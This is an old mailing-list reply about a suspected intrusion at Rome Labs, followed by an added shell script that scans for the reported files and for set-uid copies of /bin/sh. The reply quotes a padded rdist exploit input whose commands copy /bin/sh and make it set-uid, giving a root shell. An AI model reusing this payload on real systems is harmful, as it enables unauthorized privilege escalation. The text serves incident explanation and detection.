Re: Possible virus from Rome labs

Evil Pete (shipley@merde.dis.org)
Wed, 30 Mar 1994 20:55:26 -0800

>> I just got a call from Liz Keane at Rome Labs.  Apparently they
>> have had a virus up there at Rome.  It may be passed through
>> ftp and we have ftp'd them some files lately.
>> She said the virus puts two files in some random place on your system.
>> The files are:
>> 
>> jnk.tmp
>> foosh

Sounds like crackers to me, not a virus.

If foosh contains something like

 Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaaa
 Qaaaaaaaaaaaaaaaaaaaaaaa
 Scp /bin/sh /tmp/foosh
 Schmod 4755 /tmp/foosh


then it was something a person used to get root through an old hole in rdist
(when I looked for the file foosh I found it in my directory of security toys).


As for jnk.tmp, I am not sure yet.
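
An added example, not part of the original message: a sweep for the artifacts described above, covering both the reported file names (foosh, jnk.tmp) and any set-uid file that is a byte-for-byte copy of /bin/sh, whatever it is called. The function name `scan_artifacts`, the `REF_SHELL` variable and the `NAME` / `SUID-SHELL` output labels are assumptions made for this sketch.

```shell
#!/bin/sh
# Added example: look for leftovers of the kind the message describes.
# The quoted foosh contents end with "cp /bin/sh /tmp/foosh" and
# "chmod 4755 /tmp/foosh", so the thing to find is a set-uid copy of the shell.

# Shell binary to compare candidates against (hypothetical override variable).
REF_SHELL="${REF_SHELL:-/bin/sh}"

# scan_artifacts ROOT
# Prints one line per finding:
#   NAME <path>        regular file named foosh or jnk.tmp
#   SUID-SHELL <path>  set-uid regular file identical to $REF_SHELL
scan_artifacts() {
    root="$1"

    # 1. The file names reported in the thread, anywhere under ROOT.
    find "$root" -xdev -type f \( -name foosh -o -name jnk.tmp \) 2>/dev/null |
    while IFS= read -r f; do
        printf 'NAME %s\n' "$f"
    done

    # 2. Any set-uid file whose bytes match the reference shell. This still
    #    fires if the copy was given a different name than foosh.
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        if cmp -s "$f" "$REF_SHELL"; then
            printf 'SUID-SHELL %s\n' "$f"
        fi
    done
}

# Run as a script with a directory argument, e.g.:  sh scan.sh /tmp
if [ "$#" -gt 0 ]; then
    scan_artifacts "$1"
fi
```

A `NAME` hit alone only means a file with that name exists; a `SUID-SHELL` hit owned by root is the condition the chmod 4755 line in the quoted file would produce.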